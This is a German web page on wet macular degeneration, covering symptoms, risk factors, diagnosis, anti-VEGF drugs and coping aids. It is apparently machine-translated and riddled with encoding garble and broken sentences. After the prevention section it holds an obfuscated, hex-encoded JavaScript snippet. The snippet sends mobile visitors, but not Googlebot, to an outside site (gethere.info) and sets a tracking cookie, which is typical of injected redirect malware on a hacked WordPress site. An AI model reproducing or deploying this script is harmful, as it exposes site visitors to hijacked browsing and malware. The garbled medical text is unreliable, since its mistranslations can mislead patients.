Krankheit

Wet Makuladegeneration

Wet MakuladegenerationFeuchte Makuladegeneration ist eine chronische Augenerkrankung, Verlust der Sehkraft fA?hrt in der Mitte des Gesichtsfeldes.A�Feuchte Makuladegeneration ist in der Regel durch abnorme BlutgefA�AYe, FlA?ssigkeit oder Blut lecken in den Bereich der Makula (MAK-u-luh) verursacht.A�Die Makula ist in der Mitte der Netzhaut (der Gewebeschicht auf der Innenseite der RA?ckwand des Augapfels).

Feuchte Makuladegeneration ist eine von zwei Arten von altersbedingter Makuladegeneration.Die andere Art – trockene Makuladegeneration – ist hA�ufiger und weniger schwerwiegend.A�Wet Makuladegeneration beginnt fast immer als trockene Makuladegeneration.A�Es ist nicht klar, was bewirkt, feuchten Makula-Degeneration.

FrA?herkennung und Behandlung der feuchten Makula-Degeneration kann dazu beitragen, Sehverlust und in einigen FA�llen, verbessern das SehvermA�gen.

Symptome

Wet Makuladegeneration Symptome treten in der Regel schnell und Fortschritt.A�Symptome kA�nnen sein:

  • Visuelle Verzerrungen, wie gerade Linien erscheinen wellig oder krumm, eine TA?r oder StraAYenschild suchen schief, oder Objekte, die kleiner oder weiter entfernt, als sie wirklich sind, erscheinen
  • Verminderte zentrale Vision
  • Verminderte IntensitA�t oder Helligkeit der Farben
  • Gut definierte verschwommen Ort oder blinder Fleck in Ihrem Blickfeld
  • PlA�tzliche Auftreten
  • Schnelle Verschlechterung
  • Halluzinationen von geometrischen Formen, Tiere oder Menschen, in FA�llen fortgeschrittener Makuladegeneration

Wenn ein Arzt zu sehen,
Ihre Augenarzt, wenn:

  • Sie bemerken VerA�nderungen in Ihrem zentralen Sehens
  • Ihre FA�higkeit, Farben und feine Details sehen wird beeintrA�chtigt

Diese A�nderungen kA�nnen das erste Anzeichen der mac sein

Ursachen

Es ist nicht klar, was bewirkt, feuchten Makula-Degeneration.A�Der Zustand entwickelt fast immer bei Menschen, die trockene Makuladegeneration haben.A�Aber die A�rzte kA�nnen nicht vorhersagen, die feuchten Makula-Degeneration, die schwerer ist und schneller voranschreitet als die trockene Makuladegeneration zu entwickeln.

Feuchte Makuladegeneration kann auf verschiedene Weise entstehen:

  • Der Verlust der Sehkraft durch abnorme Wachstum von BlutgefA�AYen verursacht werden.A�A�Wet Makuladegeneration entwickeln kann, wenn abnorme neue BlutgefA�AYe wachsen aus der Aderhaut – die Schicht der BlutgefA�AYe zwischen der Netzhaut und dem A�uAYeren, festen Haut des Auges, die so genannte Lederhaut – unter und in der Makula Teil der Netzhaut.A�Dieser Zustand wird als choroidalen Neovaskularisation.Diese abnormen GefA�AYe kA�nnen FlA?ssigkeit oder Blut zwischen der Aderhaut und Makula auslaufen.A�Die FlA?ssigkeit stA�rt die Funktion der Netzhaut und bewirkt, dass Ihre zentrale Vision zu verwischen.A�AuAYerdem, was sehen Sie, wenn Sie geradeaus schauen wellig oder krumm, und weiAYe Flecken blockieren Teil Ihrer Sichtfeld.
  • Der Verlust der Sehkraft durch FlA?ssigkeitsansammlungen in der RA?ckseite des Auges verursacht.A�A�Wet Makuladegeneration manchmal entwickeln, wenn FlA?ssigkeit austritt aus der Aderhaut und sammelt zwischen der Aderhaut und eine dA?nne Zellschicht, die sogenannte retinale Pigmentepithel (RPE).A�Dies kann dazu fA?hren retinalen Pigmentepithel AblA�sung.Die FlA?ssigkeit unter der RPE verursacht, was aussieht wie eine Blase oder eine Beule unter der Makula.

Risikofaktoren

Faktoren, die das Risiko einer Makuladegeneration erhA�hen kA�nnen gehA�ren:

  • Alter.A�A�Ihr Risiko einer Makuladegeneration erhA�ht, wA�hrend Sie altern, vor allem nach dem 50. Lebensjahr. Makula-Degeneration ist bei Menschen A�lter als 65 am hA�ufigsten.
  • Familiengeschichte der Makula-Degeneration.A�A�Wenn jemand in Ihrer Familie hatte Makuladegeneration, sind Sie eher zu Makuladegeneration zu entwickeln.
  • Rennen.A�A�Makula-Degeneration ist hA�ufiger bei WeiAYen (Kaukasier), als es in anderen Rassen ist.
  • Raucher.A�A�Rauchen von Zigaretten erhA�ht das Risiko einer Makuladegeneration.
  • Adipositas.A�A�Als stark A?bergewichtig erhA�ht die Chance, die frA?hen oder mittleren Makuladegeneration wird dem schweren Form der Erkrankung fortschreiten.
  • Diet.A�A�Eine ErnA�hrung, die wenig Obst und GemA?se enthA�lt, kann das Risiko einer Makuladegeneration zu erhA�hen.
  • Bluthochdruck.A�A�Krankheiten, die das Kreislaufsystem, wie zum Beispiel Bluthochdruck oder hohe Cholesterinwerte zu beeinflussen, kann das Risiko einer Makuladegeneration zu erhA�hen.
  • EntzA?ndung.A�A�Ihr Immunsystem kA�nnen Schwellungen von KA�rpergewebe fA?hren, die das Risiko einer Makuladegeneration erhA�hen kann.
  • Herz-Kreislauf-Krankheit.A�A�Wenn Sie Krankheiten, die das Herz und die BlutgefA�AYe (Herz-Kreislauf-Krankheit) betroffen haben, kA�nnen Sie ein hA�heres Risiko fA?r Makuladegeneration sein.

Vorbereitung fA?r den Termin

Um Makuladegeneration zu A?berprA?fen, ist eine dilatative Auge PrA?fung erforderlich.Vereinbaren Sie einen Termin mit einem Arzt, der in der Augenheil spezialisiert – ein Augenarzt oder ein Augenarzt -, die eine komplette Augenuntersuchung durchfA?hren kA�nnen.

Weil Termine kA�nnen kurz sein, und weil es oft eine Menge zu erzA�hlen, es ist eine gute Idee, kommen fA?r den Termin gut vorbereitet.A�Hier einige Informationen, die Ihnen helfen bereit fA?r den Termin, und was Sie von Ihrem Arzt erwarten.

Was Sie tun kA�nnen

  • Seien Sie sich bewusst von allen Vor-Termin EinschrA�nkungen,A�A�und fragen, ob es etwas gibt, Sie im Voraus tun.
  • Schreiben Sie alle Symptome bei Ihnen auftreten,A�A�einschlieAYlich derjenigen, die nicht mit Ihrer Vision Problem scheinen mag.
  • Machen Sie eine Liste aller Medikamente,A�A�sowie alle Vitamine oder NahrungsergA�nzungsmittel, die Sie einnehmen.
  • Stellen Sie eine Familienmitglied oder einen Freund, Sie zu begleiten.A�A�Nachdem Sie Ihre SchA?lerinnen und SchA?ler fA?r die Augenuntersuchung erweitert werden Ihre Vision fA?r eine Zeit danach betreffen, so dass Sie jemand nach Ihrer Ernennung fahren oder begleiten Sie benA�tigen.

Fragen Sie Ihren Augenarzt zu fragen,
Ihre Zeit mit Ihrem Arzt ist begrenzt, so bereitet eine Liste von Fragen wird Ihnen helfen, das Beste aus Ihrer Zeit zusammen zu machen.A�FA?r feuchte Makuladegeneration, einige grundlegende Fragen Sie Ihren Arzt fragen sind:

  • Welche Art von Makuladegeneration habe ich?
  • Was ist die SehschA�rfe in meinem zentrale Vision?
  • Wie weit ist mein Makuladegeneration?
  • Werde ich weiter Sehverlust?
  • Wird unter einem Vitamin-oder MineralstoffprA�parat Hilfe verhindern, dass weitere Verlust der Sehkraft?
  • Was ist der beste Weg, um meine Vision fA?r alle A�nderungen zu A?berwachen?
  • Welche Sehhilfen oder adaptive GerA�te kA�nnten hilfreich fA?r mich sein?
  • Ist es sicher fA?r mich zu fahren?

ZusA�tzlich zu den Fragen, die Sie vorbereitet haben, Ihren Arzt fragen, zA�gern Sie nicht, Fragen wA�hrend Ihres Termins zu jeder Zeit, dass Sie etwas nicht verstehen, fragen Sie.

Was Sie von Ihrem Arzt erwarten, dass
Ihr Arzt wird wahrscheinlich Ihnen eine Reihe von Fragen zu stellen.A�Bereit sein, sie zu beantworten kann Zeit behalten A?ber alle Punkte, die Sie wollen, um mehr Zeit zu verbringen, um zu gehen.A�Ihr Arzt kann fragen:

  • Wann haben Sie feststellen, dass Ihre Vision Problem?
  • Ist die Bedingung auf eine oder beide Augen?
  • Haben Sie Schwierigkeiten, Dinge zu sehen, in Ihrer NA�he, in einem Abstand oder beides?
  • Rauchen Sie?
  • Haben Sie Vitamine oder NahrungsergA�nzungsmittel zu nehmen?
  • Welche Medikamente nehmen Sie?
  • Welche Arten von Lebensmitteln essen Sie?
  • Sie haben eine Familiengeschichte der Makula-Degeneration?
  • Sie haben Diabetes, Bluthochdruck oder hohe Cholesterinwerte?

Untersuchungen und Diagnostik

A�rzte werden Ihre Krankengeschichte und Familiengeschichte, und fA?hren eine umfassende Augenuntersuchung, um Ihren Zustand zu diagnostizieren.A�A�rzte kA�nnen mehrere Tests, um feuchte Makuladegeneration Diagnose, einschlieAYlich fA?hren:

  • Ein Test fA?r MA�ngel im zentralen Vision.A�A�WA�hrend einer Augenuntersuchung, Augenarzt kann eine Amsler-Gitter verwenden, um Defekte im Zentrum Ihrer Vision zu testen.A�Makula-Degeneration kann dazu fA?hren, die geraden Linien im Raster erscheinen verblasst, gebrochen oder verzerrt.
  • Eine PrA?fung der RA?ckseite des Auges.A�A�Ihr Augenarzt wird die RA?ckseite des Auges zu untersuchen, um fA?r FlA?ssigkeit oder Blut aussehen.A�Ihr Augenarzt wird Augentropfen in die Augen setzen, um Ihre Augen weiten sich und werden mit einer speziellen optischen Vorrichtung, um die RA?ckseite des Auges zu untersuchen.
  • Eine Fluorescein-Angiographie.A�A�WA�hrend einer Angiographie des Auges, wird Ihr Arzt injiziert ein Farbstoff in eine Vene in den Arm.A�Der Farbstoff reist in die BlutgefA�AYe im Auge, hebt die BlutgefA�AYe und werden dazu beitragen, abnormalen Stellen in den WA�nden der BlutgefA�AYe, die undicht werden kA�nnen.Eine spezielle Kamera nimmt mehrere Bilder von den BlutgefA�AYen im Auge wie der Farbstoff reist durch die BlutgefA�AYe.A�Die Bilder werden zeigen, wenn Sie BlutgefA�AY-oder NetzhautverA�nderungen, die unter feuchter Makuladegeneration in Verbindung gebracht werden kA�nnen.
  • Ein optischer KohA�renztomographie.A�A�Dieses nicht-invasive Bildgebung Test zeigt detaillierte Querschnittsbilder des Auges.A�Der Test identifiziert Netzhautanomalien, wie Netzhaut Schwellungen oder undichte BlutgefA�AYe im Auge.A�Es wird oft verwendet, um zu A?berwachen, die Antwort der Netzhaut-Degeneration Makula Behandlungen.

Behandlungen und Medikamente

Feuchte Makuladegeneration kann nicht geheilt werden.A�Wenn frA?hzeitig diagnostiziert, kann die Behandlung langsamen Fortschritt der feuchten Makula-Degeneration helfen und reduzieren die Menge der Vision verloren.

Medikamente, um das Wachstum abnormaler BlutgefA�AYe stoppen
Medikamente kA�nnen Stop-Wachstum neuer BlutgefA�AYe durch die Blockierung der Wirkung von Wachstumssignale sendet der KA�rper neue BlutgefA�AYe zu erzeugen helfen.A�Diese Medikamente werden als die First-Line-Behandlung fA?r alle Stufen der feuchten Makula-Degeneration.

Medikamente zur feuchten Makuladegeneration zu behandeln sind:

  • Bevacizumab (Avastin)
  • Ranibizumab (Lucentis)
  • Pegaptanib (Macugen)
  • Aflibercept (Eylea)

Ihr Arzt spritzt diese Medikamente direkt ins Auge.A�Sie kA�nnen wiederholte Injektionen alle vier Wochen unterziehen, um die positive Wirkung der Medikamente zu erhalten.A�In einigen FA�llen kA�nnen Sie einen Teil der Sehkraft, da die BlutgefA�AYe wieder schrumpfen und die FlA?ssigkeit unter der Netzhaut absorbiert, so dass Netzhautzellen, um eine Funktion wieder zu erlangen.

Einige dieser Medikamente kA�nnen das Risiko fA?r einen Schlaganfall erhA�hen.

Mit Licht, um ein Medikament injiziert (photodynamische Therapie) aktivieren
Photodynamische Therapie wird verwendet, um abnorme BlutgefA�AYe in der Mitte der Makula zu behandeln.

In diesem Verfahren, wird Ihr Arzt injiziert ein Medikament Verteporfin (Visudyne) genannt in eine Vene in den Arm, die die BlutgefA�AYe im Auge reist.A�Ihr Arzt scheint ein fokussiertes Licht aus einem speziellen Laser auf die krankhaften BlutgefA�AYe im Auge.A�Dies aktiviert das Medikament innerhalb der abnorme BlutgefA�AYe.A�Das Medikament kann dann die krankhaften BlutgefA�AYe im Auge fA?hren zu schlieAYen, was die Leckage gestoppt.

Die photodynamische Therapie kann die Vision zu verbessern und die Rate von Verlust der Sehkraft.A�Sie kA�nnen wiederholte Behandlungen im Laufe der Zeit benA�tigen, als die behandelten BlutgefA�AYe wieder zu A�ffnen.

Nach der photodynamischen Therapie, mA?ssen Sie direkte Sonneneinstrahlung und intensiv helles Licht zu vermeiden, bis die Droge Ihrem KA�rper geklA�rt, was ein paar Tage dauern kann.

Mit einem Laser zu abnormen BlutgefA�AYe (Photokoagulation) zerstA�ren
WA�hrend der Lasertherapie, verwendet Ihr Arzt eine Hochenergie-Laser-Strahl auf abnorme BlutgefA�AYe unter der Makula zerstA�ren.A�Das Verfahren wird verwendet, um eine weitere SchA�digung der Makula und langsamen anhaltenden Verlust der Sehkraft verhindern.

Die Lasertherapie wird verwendet, um feuchte Makuladegeneration nur in bestimmten Situationen zu behandeln.A�Es ist in der Regel nicht eine Option, wenn man direkt unter dem Zentrum der Makula haben abnorme BlutgefA�AYe.A�Auch ist die weitere BeschA�digung Ihrer Makula, desto geringer ist die Wahrscheinlichkeit einer funktionellen Erfolg.A�Aufgrund dieser EinschrA�nkungen, nur wenige Menschen, die feuchte Makuladegeneration haben, sind Kandidaten fA?r die Lasertherapie.

Lifestyle und Hausmittel

Makula-Degeneration hat keinen Einfluss auf Ihre Seite (peripheren) Vision und in der Regel nicht zur vA�lligen Erblindung fA?hren.A�Aber es kann zu vermindern oder zu beseitigen Ihre zentrale Vision – das ist wichtig fA?r das Fahren, Lesen und Erkennen von Gesichtern der Menschen ist.A�Es kann helfen, mit einer Low-Vision-Rehabilitation Spezialist, Ergotherapeutin, einem Augenarzt oder andere im Low-Vision-Rehabilitation, die Ihnen helfen, zu finden und lernen MA�glichkeiten, um an Ihre wechselnden Vision anzupassen geschult zu arbeiten.

Um mit wechselnden Vision, die Sie vielleicht zu bewA�ltigen:

  • Fragen Sie Ihren Augenarzt auf Ihre Brille zu A?berprA?fen.A�A�Optimieren Sie die Vision, die Sie haben, indem sie die am meisten geeignete KorrekturglA�ser fA?r Ihre Brille.
  • Verwenden Lupen.A�A�Eine Vielzahl von VergrA�AYerungsgerA�ten kA�nnen Sie mit dem Lesen und andere Nahaufnahmen, wie NA�hen helfen.A�VergrA�AYerungsgerA�te kA�nnen traditionelle HandvergrA�AYerungslinsen oder spezielle VergrA�AYerungslinsen Sie sich wie eine Brille tragen sind.Sie kA�nnen auch eine Closed-Circuit-TV-System, das eine Videokamera verwendet, um Lesestoff vergrA�AYern und projiziert sie auf einem Bildschirm.
  • A�ndern Sie Ihre Computer-Display, und fA?gen Sie Audiosysteme.A�A�Passen Sie die SchriftgrA�AYe in den Einstellungen Ihres Computers.A�Stellen Sie Ihren Monitor an mehr Kontrast zu zeigen.A�Sie kA�nnen auch Sprachausgabesysteme oder andere Technologien, um Ihrem Computer hinzufA?gen.
  • Verwenden Sie alternative Optionen fA?r BA?cher.A�A�Um zu lesen, verwenden Sie BA?cher in GroAYdruck, elektronische LesegerA�te, Tabletten-oder Audio-BA?cher.A�Einige Tablets und Smartphones haben Anwendungen, die hinzugefA?gt werden, um Menschen mit Sehbehinderung zu unterstA?tzen, wie zum Beispiel VergrA�AYerungs Text.
  • WA�hlen SpezialgerA�te fA?r Sehbehinderte gemacht.A�A�Einige Uhren, Radios, Telefone und andere GerA�te verfA?gen A?ber extra groAYe Zahlen.A�Andere GerA�te kA�nnen Sie die Zeit zu sprechen oder andere wichtige Informationen zu erzA�hlen.A�Sie finden es einfacher, einen Fernseher mit einem grA�AYeren High-Definition-Bildschirm zu sehen, oder mA�chten Sie vielleicht nA�her an den Bildschirm zu sitzen.
  • Verwenden heller Lichter in Ihrem Zuhause.A�A�Hellere Beleuchtung wird mit dem Lesen und anderen tA�glichen AktivitA�ten in Ihrem Haus zu helfen.
  • Vorsicht beim Fahren.A�A�A?berprA?fen Sie zuerst mit Ihrem Arzt, ob Fahren ist immer noch sicher auf Ihrem aktuellen Vision.A�Wenn Sie fahren zu tun, bestimmte Situationen erfordern besondere Vorsicht, wie das Fahren in der Nacht, bei starkem Verkehr oder bei schlechtem Wetter.
  • BerA?cksichtigen Sie auch andere ReisemA�glichkeiten.A�A�Nutzen Sie die A�ffentlichen Verkehrsmittel oder fragen Familienmitglieder zu helfen, vor allem bei Nachtfahrten.Vorkehrungen treffen, um lokale Van oder Shuttle-Services, ehrenamtliche Fahr Netzwerke oder Mitfahrgelegenheiten zu nutzen.
  • Holen Sie sich UnterstA?tzung.A�A�gestA?tzt Makuladegeneration kann schwierig sein, und Sie mA?ssen zu viele VerA�nderungen in Ihrem Leben machen.A�Sie kA�nnen durch viele Emotionen gehen, wie Sie mit Makuladegeneration einzustellen.A�Betrachten Sie im GesprA�ch mit einem Berater oder Beitritt zu einer Selbsthilfegruppe zu helfen, einstellen, um Ihren Zustand und VerA�nderungen im Leben.A�Verbringen Sie Zeit mit Familie und Freunde, die Sie UnterstA?tzung anbieten kA�nnen.

Vorbeugung

Folgende MaAYnahmen kA�nnen helfen, Makula-Degeneration zu vermeiden:

  • Haben Routine Augenuntersuchungen.A�A�Fragen Sie Ihren Augenarzt, wie oft Sie sollte Routine Augenuntersuchungen zu unterziehen.A�Eine Augenuntersuchung kann erweitert Makuladegeneration zu identifizieren.
  • Verwalten Sie Ihre anderen medizinischen Bedingungen.A�A�Zum Beispiel, wenn Sie Herz-Kreislauferkrankungen oder Bluthochdruck haben, nehmen Sie Ihre Medikamente und folgen Sie die Anweisungen Ihres Arztes zur Steuerung der Zustand.
  • AufhA�ren zu rauchen.A�A�Raucher sind eher Makuladegeneration zu entwickeln sind als Nichtraucher.A�Fragen Sie Ihren Arzt fA?r die Hilfe mit dem Rauchen aufzuhA�ren.
  • Pflegen Sie ein gesundes Gewicht und regelmA�AYig trainieren.A�A�Wenn Sie brauchen, um Gewicht zu verlieren, reduzieren Sie die Anzahl der Kalorien, die Sie essen und erhA�hen die Menge der A?bung, die Sie bekommen jeden Tag.A�Pflegen Sie ein gesundes Gewicht durch die AusA?bung regelmA�AYig und Steuerung Ihrer ErnA�hrung.
  • WA�hlen Sie eine ErnA�hrung reich an Obst und GemA?se.A�A�WA�hlen Sie eine gesunde ErnA�hrung, die voll von einer Vielzahl von Obst und GemA?se ist.A�Diese Lebensmittel enthalten antioxidative Vitamine, die das Risiko der Entwicklung Makula-Degeneration verringern.
  • FA?gen Sie Fisch in der ErnA�hrung.A�A�Omega-3-FettsA�uren, die in Fisch vorkommen, kann das Risiko einer Makuladegeneration zu reduzieren.A�NA?sse wie WalnA?sse, enthalten auch Omega-3-FettsA�uren.

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Powered by: Wordpress